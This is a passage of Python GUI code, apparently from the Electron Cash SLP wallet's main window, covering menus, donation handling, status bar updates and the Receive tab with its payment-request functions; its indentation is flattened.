wallet_menu.addAction(_("Refresh GUI"), self.update_wallet, QKeySequence("Ctrl+R"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
if self.is_slp_wallet:
add_toggle_action(view_menu, self.slp_mgt_tab)
add_toggle_action(view_menu, self.slp_history_tab)
tools_menu = menubar.addMenu(_("&Tools"))
prefs_tit = _("Preferences") + "..."
a = tools_menu.addAction(prefs_tit, self.settings_dialog, QKeySequence("Ctrl+,") ) # Note: on macOS this hotkey sequence won't be shown in the menu (since it's reserved by the system), but will still work. :/
if sys.platform == 'darwin':
# This turns off the heuristic matching based on name and keeps the
# "Preferences" action out of the application menu and into the
# actual menu we specified on macOS.
a.setMenuRole(QAction.NoRole)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network") + "...", lambda: gui_object.show_network_dialog(weakSelf()), QKeySequence("Ctrl+K"))
tools_menu.addAction(_("Optional &Features") + "...", self.internal_plugins_dialog, QKeySequence("Shift+Ctrl+P"))
tools_menu.addAction(_("Installed &Plugins") + "...", self.external_plugins_dialog, QKeySequence("Ctrl+P"))
if sys.platform in ('linux', 'linux2', 'linux3'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware Wallet Support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/Verify Message") + "...", self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/Decrypt Message") + "...", self.encrypt_message)
tools_menu.addSeparator()
tools_menu.addAction(_("Upload a file using BFP"), lambda: BitcoinFilesUploadDialog(self, None, True, "Upload a File Using BFP"))
tools_menu.addAction(_("Download a file using BFP"), lambda: BfpDownloadFileDialog(self,))
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to Many"), self.paytomany, QKeySequence("Ctrl+M"))
raw_transaction_menu = tools_menu.addMenu(_("&Load Transaction"))
raw_transaction_menu.addAction(_("From &File") + "...", self.do_process_from_file)
raw_transaction_menu.addAction(_("From &Text") + "...", self.do_process_from_text, QKeySequence("Ctrl+T"))
raw_transaction_menu.addAction(_("From the &Blockchain") + "...", self.do_process_from_txid, QKeySequence("Ctrl+B"))
raw_transaction_menu.addAction(_("From &QR Code") + "...", self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("About Qt"), self.app.aboutQt)
help_menu.addAction(_("&Check for Updates"), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official Website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug..."), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to Server") + "...", self.donate_to_server)
def donate_to_server(self):
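        '''Collect donation addresses advertised by the connected server and by
        plugins; if there is more than one, ask the user which to pay, then open
        a payment URI for the chosen address.'''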
if self.gui_object.warn_if_no_network(self):
return
d = {}
spv_address = self.network.get_donation_address()
spv_prefix = _("Blockchain Server")
donation_for = _("Donation for")
if spv_address:
host = self.network.get_parameters()[0]
d[spv_prefix + ": " + host] = spv_address
plugin_servers = run_hook('donation_address', self, multi=True)
for tup in plugin_servers:
if not isinstance(tup, (list, tuple)) or len(tup) != 2:
continue
desc, address = tup
if (desc and address and isinstance(desc, str) and isinstance(address, Address)
and desc not in d and not desc.lower().startswith(spv_prefix.lower())):
d[desc] = address.to_ui_string()
def do_payto(desc):
addr = d[desc]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{pre}:{addr}?message={donation_for} {desc}'
.format(pre = networks.net.CASHADDR_PREFIX,
addr = addr,
donation_for = donation_for,
desc = desc))
if len(d) == 1:
do_payto(next(iter(d.keys())))
elif len(d) > 1:
choices = tuple(d.keys())
index = self.query_choice(_('Please select which server you would like to donate to:'), choices, add_cancel_button = True)
if index is not None:
do_payto(choices[index])
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash SLP",
"<p><font size=+3><b>Electron Cash SLP</b></font></p><p>" + _("Version") + f" {self.wallet.electrum_version}" + "</p>" +
'<p><span style="font-size:11pt; font-weight:500;">' + "Copyright © 2017-2019<br>Electron Cash LLC & The Electron Cash Developers" + "</span></p>" +
'<p><span style="font-weight:200;">' +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system.") +
"</span></p>"
)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=https://github.com/simpleledger/Electron-Cash-SLP/issues>https://github.com/simpleledger/Electron-Cash-SLP/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
sats_per_byte = format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1))
return _('{sats_per_byte} sat/byte').format(sats_per_byte=sats_per_byte)
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
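        '''Link a BTC amount edit and its fiat counterpart so that editing one
        recomputes the other from the current exchange rate.'''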
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
def update_status(self):
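        '''Refresh the status bar: connection icon and tooltip, balance text
        (including the selected SLP token balance when applicable), fiat balance,
        and the seed backup button state.'''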
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
"seed_ok" : QIcon(":icons/seed.png"),
"seed_warning" : QIcon(":icons/seed_warning.png")
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
text = ""
if not self.is_slp_wallet:
text += "Tokens Disabled - "
else:
token_id = self.slp_token_id
try:
d = self.wallet.token_types[token_id]
except (AttributeError, KeyError):
pass
else:
bal = format_satoshis_nofloat(self.wallet.get_slp_token_balance(token_id, { 'user_config': { 'confirmed_only': False } })[0],
decimal_point=d['decimals'],)
text += "%s Token Balance: %s; "%(d['name'], bal)
c, u, x = self.wallet.get_balance()
text += _("BCH Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text += " " + ( _("[%d unverified TXs]") % n_unverif )
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
# Provide extra warning and instructions to user if he/she has tokens in a non-SLP wallet type.
if not self.is_slp_wallet:
locked_in_slp = self.wallet.get_slp_locked_balance()
if locked_in_slp > 0:
self._warn_slp_prefers_slp_wallets_if_not_slp_wallet()
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
addr_format = self.config.get('addr_format', 1)
self.setAddrFormatText(addr_format)
self.status_button.setIcon( icon )
self.status_button.setStatusTip( status_tip )
if self.wallet.has_seed():
if self.wallet.storage.get('wallet_seed_needs_backup'):
self.seed_button.setIcon(icon_dict["seed_warning"])
self.seed_button.setToolTip(_("Seed Requires Backup!"))
self.seed_button.setStatusTip(self.seed_button.toolTip())
else:
self.seed_button.setIcon(icon_dict["seed_ok"])
self.seed_button.setToolTip(_("Seed"))
self.seed_button.setStatusTip(None)
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def create_slp_history_tab(self):
from .slp_history_list import HistoryList
self.slp_history_list = l = HistoryList(self)
return self.create_list_tab(l)
def show_address(self, addr, *, parent=None):
parent = parent or self.top_level_window()
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def addr_toggle_slp(self, force_slp=False):
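        '''Toggle the Receive tab between the SLP address format and the cash
        address format; the token request widgets are enabled when the SLP format
        is shown. force_slp switches to the SLP format unconditionally.'''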
def present_slp():
self.toggle_cashaddr(2, True)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
if force_slp:
present_slp()
return
if Address.FMT_UI == Address.FMT_SLPADDR:
self.toggle_cashaddr(1, True)
self.receive_token_type_combo.setCurrentIndex(0)
else:
present_slp()
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
if self.is_slp_wallet:
self.show_slp_addr_btn = QPushButton(_('Show Token Address'))
self.show_slp_addr_btn.clicked.connect(self.addr_toggle_slp)
grid.addWidget(self.show_slp_addr_btn, 1, 1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_message_e, 2, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_opreturn_e, 3, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 3, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
msg = _('Select the SLP token to Request.')
self.receive_token_type_combo = QComboBox()
if ColorScheme.dark_scheme and sys.platform == 'darwin':
# Hack/Workaround to QDarkStyle bugs; see https://github.com/ColinDuquesnoy/QDarkStyleSheet/issues/169#issuecomment-494647801
self.receive_token_type_combo.setItemDelegate(QStyledItemDelegate(self.receive_token_type_combo))
self.receive_token_type_combo.setFixedWidth(200)
self.receive_token_type_combo.currentIndexChanged.connect(self.on_slptok_receive)
#self.receive_token_type_combo.currentIndexChanged.connect(self.update_buttons_on_seed) # update 'CoinText' button, etc
self.receive_slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.receive_slp_token_type_label, 4, 0)
grid.addWidget(self.receive_token_type_combo, 4, 1)
self.receive_slp_amount_e = SLPAmountEdit('tokens', 0)
self.receive_slp_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_slp_amount_label = QLabel(_('Req. token amount'))
grid.addWidget(self.receive_slp_amount_label, 5, 0)
grid.addWidget(self.receive_slp_amount_e, 5, 1)
self.receive_slp_amount_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
self.receive_amount_e.setFixedWidth(self.receive_token_type_combo.width())
self.receive_amount_label = QLabel(_('Requested &amount'))
self.receive_amount_label.setBuddy(self.receive_amount_e)
grid.addWidget(self.receive_amount_label, 6, 0)
grid.addWidget(self.receive_amount_e, 6, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
if Address.FMT_UI != Address.FMT_SLPADDR:
self.receive_token_type_combo.setDisabled(True)
self.receive_slp_token_type_label.setDisabled(True)
self.receive_slp_amount_e.setDisabled(True)
self.receive_slp_amount_label.setDisabled(True)
else:
self.receive_token_type_combo.setDisabled(False)
self.receive_slp_token_type_label.setDisabled(False)
self.receive_slp_amount_e.setDisabled(False)
self.receive_slp_amount_label.setDisabled(False)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 6, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([_(i[0]) for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 7, 0)
grid.addWidget(self.expires_combo, 7, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.hide()
grid.addWidget(self.expires_label, 7, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(self, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 8, 1, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
slf = weakSelf()
if slf:
slf.check_and_reset_receive_address_if_needed()
if self.main_window.is_slp_wallet:
if Address.FMT_UI == Address.FMT_SLPADDR:
self.main_window.show_slp_addr_btn.setText("Show BCH Address")
else:
self.main_window.show_slp_addr_btn.setText("Show Token Address")
else:
self.main_window.toggle_cashaddr(1, True)
w = ReceiveTab()
w.low_balance_warning_shown = False
w.main_window = self
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
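        '''Build the payment URI for the saved request at addr, including amount,
        label, OP_RETURN and token_id, plus time, expiry and signature parameters
        when present.'''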
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw, token_id=req.get('token_id'))
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
if self.receive_token_type_combo.currentData() is not None:
amount = float(self.receive_slp_amount_e.text())
else:
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
if self.receive_token_type_combo.currentData() is not None:
tokenid = self.receive_token_type_combo.currentData()
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, token_id=tokenid, **kwargs)
else:
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
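        '''Reset the Receive tab to a fresh unused address for a new request.
        If none is available, either fall back to reusing the receiving address
        (non-deterministic wallets) or ask before creating one past the gap limit.'''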
self.receive_token_type_combo.setCurrentIndex(0)
self.receive_slp_amount_e.setText("")
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
                    # create a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
